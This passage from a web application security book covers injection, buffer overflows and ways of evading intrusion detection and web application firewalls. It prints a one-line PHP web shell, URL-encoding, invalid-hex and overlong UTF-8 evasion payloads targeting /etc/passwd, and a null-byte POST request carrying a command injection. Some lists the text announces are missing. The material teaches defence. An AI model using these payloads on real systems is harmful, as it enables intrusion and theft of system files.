A frequent error is to allow content management applications to upload files (images) under the web server tree but forget to disable script execution in the folder. If someone hijacks the content management application and uploads a script instead of an image he will be able to execute anything on the server. He will often only upload a one-line script similar to this one:

<? passthru($cmd) ?>

Try it out for yourself and see how easy it can be.

Injection attacks can be prevented if proper thought is given to the problem in the software design phase. These attacks can occur anywhere where characters with a special meaning, metacharacters, are mixed with data. There are many types of metacharacters. Each system component can use different metacharacters for different purposes. In HTML, for example, special characters are &, <, >, “, and ’. Problems only arise if the programmer does not take steps to handle metacharacters properly.

To prevent injection attacks, a programmer needs to perform four steps:

Data validation and transformation should be automated wherever possible. For example, if transformation is performed in each script then each script is a potential weak point. But if scripts use an intermediate library to retrieve user input and the library contains functionality to handle data validation and transformation, then you only need to make sure the library works as expected. This principle can be extended to cover all data manipulation: never handle data directly, always use a library.

The metacharacter problem can be avoided if control information is transported independently from data. In such cases, special characters that occur in data lose all their powers, transformation is unnecessary and injection attacks cannot succeed. The use of prepared statements to interact with a database is one example of control information and data separation.

Buffer overflow occurs when an attempt is made to use a limited-length buffer to store a larger piece of data. Because of the lack of boundary checking, some amount of data will be written to memory locations immediately following the buffer. When an attacker manipulates program input, supplying specially crafted data payload, buffer overflows can be used to gain control of the application.

Buffer overflows affect C-based languages. Since most web applications are scripted (or written in Java, which is not vulnerable to buffer overflows), they are seldom affected by buffer overflows. Still, a typical web deployment can contain many components written in C:

Note that external systems such as databases, mail servers, directory servers and other servers are also often programmed in C. That the application itself is scripted is irrelevant. If data crosses system boundaries to reach the external system, an attacker could exploit a vulnerability.

A detailed explanation of how buffer overflows work falls outside the scope of this book. Consult the following resources to learn more:

Intrusion detection systems (IDSs) are an integral part of web application security. In Chapter 9, I introduced web application firewalls (also covered in Chapter 12), whose purpose is to detect and reject malicious requests.

Most web application firewalls are signature-based. This means they monitor HTTP traffic looking for signature matches, where this type of “signature” is a pattern that suggests an attack. When a request is matched against a signature, an action is taken (as specified by the configuration). But if an attacker modifies the attack payload in some way to have the same meaning for the target but not to resemble a signature the web application firewall is looking for, the request will go through. Techniques of attack payload modification to avoid detection are called evasion techniques.

Evasion techniques are a well-known tool in the TCP/IP-world, having been used against network-level IDS tools for years. In the web security world, evasion is somewhat new. Here are some papers on the subject:

  • “A look at whisker’s anti-IDS tactics” by Rain Forest Puppy (http://www.apachesecurity.net/archive/whiskerids.html)

  • “IDS Evasion Techniques and Tactics” by Kevin Timm (http://www.securityfocus.com/printable/infocus/1577)

Many evasion techniques are used in attacks against the filesystem. For example, many methods can obfuscate paths to make them less detectable:

Some characters have a special meaning in URLs, and they have to be encoded if they are going to be sent to an application rather than interpreted according to their special meanings. This is what URL encoding is for. (See RFC 1738 at http://www.ietf.org/rfc/rfc1738.txt and RFC 2396 at http://www.ietf.org/rfc/rfc2396.txt.) I showed URL encoding several times in this chapter, and it is an essential technique for most web application attacks.

It can also be used as an evasion technique against some network-level IDS systems. URL encoding is mandatory only for some characters but can be used for any. As it turns out, sending a string of URL-encoded characters may help an attack slip under the radar of some IDS tools. In reality, most tools have improved to handle this situation.

Sometimes, rarely, you may encounter an application that performs URL decoding twice. This is not correct behavior according to standards, but it does happen. In this case, an attacker could perform URL encoding twice.

The URL:

http://www.example.com/paynow.php?p=attack

becomes:

http://www.example.com/paynow.php?p=%61%74%74%61%63%6B

when encoded once (since %61 is an encoded a character, %74 is an encoded t character, and so on), but:

http://www.example.com/paynow.php?p=%2561%2574%2574%2561%2563%256B

when encoded twice (where %25 represents a percent sign).

If you have an IDS watching for the word “attack”, it will (rightly) decode the URL only once and fail to detect the word. But the word will reach the application that decodes the data twice.

There is another way to exploit badly written decoding schemes. As you know, a character is URL-encoded when it is represented with a percentage sign, followed by two hexadecimal digits (0-F, representing the values 0-15). However, some decoding functions never check to see if the two characters following the percentage sign are valid hexadecimal digits. Here is what a C function for handling the two digits might look like:

unsigned char x2c(unsigned char *what) {    
    unsigned char c0 = toupper(what[0]);
    unsigned char c1 = toupper(what[1]);
    unsigned char digit;
   
    digit = ( c0 >= 'A' ? c0 - 'A' + 10 : c0 - '0' );
    digit = digit * 16;
    digit = digit + ( c1 >= 'A' ? c1 - 'A' + 10 : c1 - '0' );
   
    return digit;
}

This code does not do any validation. It will correctly decode valid URL-encoded characters, but what happens when an invalid combination is supplied? By using higher characters than normally allowed, we could smuggle a slash character, for example, without an IDS noticing. To do so, we would specify XV for the characters since the above algorithm would convert those characters to the ASCII character code for a slash.

The URL:

http://www.example.com/paynow.php?p=/etc/passwd

would therefore be represented by:

http://www.example.com/paynow.php?p=%XVetc%XVpasswd

Unicode attacks can be effective against applications that understand it. Unicode is the international standard whose goal is to represent every character needed by every written human language as a single integer number (see http://en.wikipedia.org/wiki/Unicode). What is known as Unicode evasion should more correctly be referenced as UTF-8 evasion. Unicode characters are normally represented with two bytes, but this is impractical in real life. First, there are large amounts of legacy documents that need to be handled. Second, in many cases only a small number of Unicode characters are needed in a document, so using two bytes per character would be wasteful.

UTF-8, a transformation format of ISO 10646 (http://www.ietf.org/rfc/rfc2279.txt) allows most files to stay as they are and still be Unicode compatible. Until a special byte sequence is encountered, each byte represents a character from the Latin-1 character set. When a special byte sequence is used, two or more (up to six) bytes can be combined to form a single complex Unicode character.

One aspect of UTF-8 encoding causes problems: non-Unicode characters can be represented encoded. What is worse is multiple representations of each character can exist. Non-Unicode character encodings are known as overlong characters, and may be signs of attempted attack. There are five ways to represent an ASCII character. The five encodings below all decode to a new line character (0x0A):

0xc0 0x8A
0xe0 0x80 0x8A
0xf0 0x80 0x80 0x8A
0xf8 0x80 0x80 0x80 0x8A
0xfc 0x80 0x80 0x80 0x80 0x8A

Invalid UTF-8 encoding byte combinations are also possible, with similar results to invalid URL encoding.

Using URL-encoded null bytes is an evasion technique and an attack at the same time. This attack is effective against applications developed using C-based programming languages. Even with scripted applications, the application engine they were developed to work with is likely to be developed in C and possibly vulnerable to this attack. Even Java programs eventually use native file manipulation functions, making them vulnerable, too.

Internally, all C-based programming languages use the null byte for string termination. When a URL-encoded null byte is planted into a request, it often fools the receiving application, which happily decodes the encoding and plants the null byte into the string. The planted null byte will be treated as the end of the string during the program’s operation, and the part of the string that comes after it and before the real string terminator will practically vanish.

We looked at how a URL-encoded null byte can be used as an attack when we covered source code disclosure vulnerabilities in the “Source Code Disclosure” section. This vulnerability is rare in practice though Perl programs can be in danger of null-byte attacks, depending on how they are programmed.

Null-byte encoding is used as an evasion technique mainly against web application firewalls when they are in place. These systems are almost exclusively C-based (they have to be for performance reasons), making the null-byte evasion technique effective.

Web application firewalls trigger an error when a dangerous signature (pattern) is discovered. They may be configured not to forward the request to the web server, in which case the attack attempt will fail. However, if the signature is hidden after an encoded null byte, the firewall may not detect the signature, allowing the request through and making the attack possible.

To see how this is possible, we will look at a single POST request, representing an attempt to exploit a vulnerable form-to-email script and retrieve the passwd file:

POST /update.php HTTP/1.0
Host: www.example.com
Content-Type: application/x-form-urlencoded
Content-Length: 78
   
firstname=Ivan&lastname=Ristic%00&email=ivanr@webkreator.com;cat%20/etc/passwd

A web application firewall configured to watch for the /etc/passwd string will normally easily prevent such an attack. But notice how we have embedded a null byte at the end of the lastname parameter. If the firewall is vulnerable to this type of evasion, it may miss our command execution attack, enabling us to continue with compromise attempts.

Web security is not easy because it requires knowledge of many different systems and technologies. The resources listed here are only a tip of the iceberg.